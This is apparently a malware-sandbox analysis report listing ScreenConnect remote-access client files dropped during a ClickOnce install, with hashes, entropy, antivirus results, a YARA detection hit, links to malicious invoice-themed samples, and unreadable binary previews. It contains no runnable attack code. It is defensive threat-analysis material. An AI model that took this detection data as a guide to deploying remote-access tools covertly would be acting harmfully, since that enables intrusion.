Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\manifests\scre..tion_25b0fbb6ef7eb094_0018.0003_none_38bfca06a9457575.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	14608
Entropy (8bit):	5.715926122579569
Encrypted:	false
SSDEEP:	192:CMtI9rf6h9o8s8owwSzN8s8oTN2x2QPIlFDLhEDh7BqWojO7:CM29rf6QX9mxX9R/QPIBM7Yjs
MD5:	FD771B6C5C7BB132CD94745D81FC7535
SHA1:	EC47E268D7192387073D12FA6F857447F6E9B9A2
SHA-256:	A86CC47BEF95CA40FC1235C38A73834997DD41594018242F3F5BB17BC64D832F
SHA-512:	27F4AC072DE4C6D640CD27F23561344E7428676D50924E497963085D6CBB1D2193C185311BA21D2CC346E3C34295167F9BDDC05ABC7F7FEA145B3B6D9AD7F05C
Malicious:	false
Preview:	PcmH........1?..:J..$...@.......T...............8...........#........<.g..J.\|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$............?..]k..........8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......<8......D8......L8......l8......p8..L...x8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%.q..T#..=W...K...Oi..?.............-........................E......................................4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client....................................P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.3.7.9067%........................

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\manifests\scre..tion_25b0fbb6ef7eb094_0018.0003_none_38bfca06a9457575.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
Category:	dropped
Size (bytes):	117161
Entropy (8bit):	5.583971122293747
Encrypted:	false
SSDEEP:	3072:xNIcT51/FXvMVNWfCXq9ym7m2o9HuzhJOvP:gcfiVIpmt8vOvP
MD5:	FE06C5E9C53AB451368667D3E3B1504B
SHA1:	7C76334BB2BC0D1E444A1FCAA484B642572CAD1E
SHA-256:	89EB055F32184DFE333494A271ED865958D5ADC1521043C6D81098F541CC0B3F
SHA-512:	B0C6570F937582B1072491506992AD077BD271B7301C26624A9418BAF77BBE5496D30EF3522D63D60EF8BEECC2CA113788B4A91833B99D931C841BAC0D051CAA
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.3.7.9067" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\manifests\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071.cdf-ms

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	4428
Entropy (8bit):	4.105005840603432
Encrypted:	false
SSDEEP:	48:la3CDVxQ1goXe6S+9ow87gWW75uvsdOxV4wOB8f1fT55sFTnw9GUjdLf:la3TeV+Ww8x45u4OYwOB8FT5En6GyVf
MD5:	7098E1705B924A734A951D952233BC4D
SHA1:	E55BC5E608EB2C8874456EC7FF5E15A049616185
SHA-256:	92D0E053F7813DB0CB2095C619E4625F98AF1753798EA1E2F99DF73D1EFE7F91
SHA-512:	707E3978E37409695C4C37A17333C64851518C0445F8C1D153865BC4AE6D7CBAA30AE796D6A50B8C640B8878157362693A393815835627B90F6D65B020AB7BAD
Malicious:	false
Preview:	PcmH.........2....z,...T.......T...............8...........+........<.g..J.\|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$............?..]k........6...................z..w.....[~31.X......E..X.....s".I...R....y..&..d......B(.........O.&r..Vz!...[s.T..<$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......\|...........(...............................(................... ...(...8.......`.......h...(...\|...................(...............L...........0...................................................................................................................................................................................................................................................................................................nameScreenConnect.Cl

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\manifests\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1632
Entropy (8bit):	5.089918322084496
Encrypted:	false
SSDEEP:	48:3FYZ8h9o9gI0AQGCHMQgTMQg3MQgGAXTo:1YiW0AQQQ9QvQyc
MD5:	4E77158D54337B51A6368D7D094397C4
SHA1:	3A029B30B95786ADF97FB3C0B1C37B11154E0344
SHA-256:	276B0232A7C76292D34207F916966EA1BCD5CD7E1E1D9A2751C663F06E45B63C
SHA-512:	69D7A90B2802575555E68991D157885253A72F5ED5181AF5795E52BB6165B979542F482BAC1E3CC164013133A4B812E1EC10BBCD39AA1166318099ABC267ED95
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.ClientService.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	95512
Entropy (8bit):	6.504684691533346
Encrypted:	false
SSDEEP:	1536:Eg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkggU0HMx790K:dhbNDxZGXfdHrX7rAc6myJkggU0HqB
MD5:	75B21D04C69128A7230A0998086B61AA
SHA1:	244BD68A722CFE41D1F515F5E40C3742BE2B3D1D
SHA-256:	F1B5C000794F046259121C63ED37F9EFF0CFE1258588ECA6FD85E16D3922767E
SHA-512:	8D51B2CD5F21C211EB8FEA4B69DC9F91DFFA7BB004D9780C701DE35EAC616E02CA30EF3882D73412F7EAB1211C5AA908338F3FA10FDF05B110F62B8ECD9D24C2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Rechnung_10401.js, Detection: malicious, Browse Filename: Rechnung_Datum_November 24_6957.js, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................>)....@.................................p...x....`..P............L...)...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	61208
Entropy (8bit):	6.310126082367387
Encrypted:	false
SSDEEP:	1536:kW/+lo6MOc8IoiKWjrNv8DtyQ4RE+TC6WAhVbb57bP8:kLlo6dccldyQGWy5s
MD5:	AFA97CAF20F3608799E670E9D6253247
SHA1:	7E410FDE0CA1350AA68EF478E48274888688F8EE
SHA-256:	E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
SHA-512:	FE0B378651783EF4ADD3851E12291C82EDCCDE1DBD1FA0B76D7A2C2DCD181E013B9361BBDAE4DAE946C0D45FB4BF6F75DC027F217326893C906E47041E3039B0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Rechnung_10401.js, Detection: malicious, Browse Filename: Rechnung_Datum_November 24_6957.js, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c+..........."...0.................. ........@.. ....................... .......r....@.....................................O....... ................)..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....^.(.......a...%...}....:.(......}....:.(......}....:.(......}........0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!......0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsClient.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsFileManager.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	81688
Entropy (8bit):	5.8618809599146005
Encrypted:	false
SSDEEP:	1536:Ety9l44Kzb1I5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7j27Vy:PvqukLdn2s
MD5:	1AEE526DC110E24D1399AFFCCD452AB3
SHA1:	04DB0E8772933BC57364615D0D104DC2550BD064
SHA-256:	EBD04A4540D6E76776BD58DEEA627345D0F8FBA2C04CC65BE5E979A8A67A62A1
SHA-512:	482A8EE35D53BE907BE39DBD6C46D1F45656046BACA95630D1F07AC90A66F0E61D41F940FB166677AC4D5A48CF66C28E76D89912AED3D673A80737732E863851
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....o..........."...0..@...........^... ...`....@.. .......................`.......$....@..................................^..O....`...................)...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....^.(.......;...%...}....:.(......}....:.(......}....:.(......}........0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(........(+...o,...(-...t....

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsFileManager.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\ScreenConnect.Core.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	548864
Entropy (8bit):	6.034211651049746
Encrypted:	false
SSDEEP:	12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
MD5:	14E7489FFEBBB5A2EA500F796D881AD9
SHA1:	0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
SHA-256:	A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
SHA-512:	2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\ScreenConnect.Windows.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721856
Entropy (8bit):	6.639085961200334
Encrypted:	false
SSDEEP:	24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
MD5:	9AD3964BA3AD24C42C567E47F88C82B2
SHA1:	6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
SHA-256:	84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
SHA-512:	CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..\|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...\|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	602392
Entropy (8bit):	6.176232491934078
Encrypted:	false
SSDEEP:	6144:fybAk1FVMVTZL/4TvqpU0pSdRW3akod1sI5mgve8mZXuRFtSc4q2/R4IEyxuV5AN:qbAOwJ/MvIFptJoR5NmtiFsxsFE
MD5:	1778204A8C3BC2B8E5E4194EDBAF7135
SHA1:	0203B65E92D2D1200DD695FE4C334955BEFBDDD3
SHA-256:	600CF10E27311E60D32722654EF184C031A77B5AE1F8ABAE8891732710AFEE31
SHA-512:	A902080FF8EE0D9AEFFA0B86E7980457A4E3705789529C82679766580DF0DC17535D858FBE50731E00549932F6D49011868DEE4181C6716C36379AD194B0ED69
Malicious:	false
Yara Hits:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`............@.................................M...O.... ...................)...@..........8............................................ ............... ..H............text...p.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......XJ......................$.........................................{D.....{E...V.(F.....}D.....}E......0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...... }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N.....{O.....{P...V.(F.....}O.....}P....0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...... 1.c. )UU.

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\ScreenConnect.Client.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.586775768189165
Encrypted:	false
SSDEEP:	3072:/xLtNGTlIyS7/ObjusqVFJRJcyzvYqSmzDvJXYF:FtNGTGySabqPJYbqSmG
MD5:	3724F06F3422F4E42B41E23ACB39B152
SHA1:	1220987627782D3C3397D4ABF01AC3777999E01C
SHA-256:	EA0A545F40FF491D02172228C1A39AE68344C4340A6094486A47BE746952E64F
SHA-512:	509D9A32179A700AD76471B4CD094B8EB6D5D4AE7AD15B20FD76C482ED6D68F44693FC36BCB3999DA9346AE9E43375CD8FE02B61EDEABE4E78C4E2E44BF71D42
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ... ....... .......................`......#.....@.................................A...O.... ..\|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...\|.... ......................@..@.reloc.......@......................@..B................u.......H...........4............_...... .........................................(......(....^.(...........%...}....:.(......}....:.(......}....:.(......}......{....:.(......}.....0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o........0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=.....0...........~...%-.&~).....\|...s&...%....(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\Client.en-US.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	50133
Entropy (8bit):	4.759054454534641
Encrypted:	false
SSDEEP:	1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
MD5:	D524E8E6FD04B097F0401B2B668DB303
SHA1:	9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
SHA-256:	07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
SHA-512:	E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C\|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..v.......B....A...a......D..c..w..K,..t...S.....v....7.6\|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........\|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\Client.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	26722
Entropy (8bit):	7.7401940386372345
Encrypted:	false
SSDEEP:	384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
MD5:	5CD580B22DA0C33EC6730B10A6C74932
SHA1:	0B6BDED7936178D80841B289769C6FF0C8EEAD2D
SHA-256:	DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
SHA-512:	C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
Malicious:	false
